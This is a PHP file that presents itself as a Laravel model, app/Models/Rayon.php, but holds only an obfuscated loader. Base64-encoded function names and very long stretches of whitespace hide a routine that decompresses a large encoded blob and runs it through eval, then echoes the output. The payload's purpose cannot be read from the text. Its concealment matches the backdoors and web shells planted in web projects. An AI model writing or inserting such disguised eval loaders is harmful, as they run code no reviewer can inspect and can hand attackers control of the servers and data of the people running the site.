<?php 
        $__='printf';$_='Loading app/Models/Rayon.php';
        



















































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


















































































































































































                                                                                                                                                                                                                     $________;
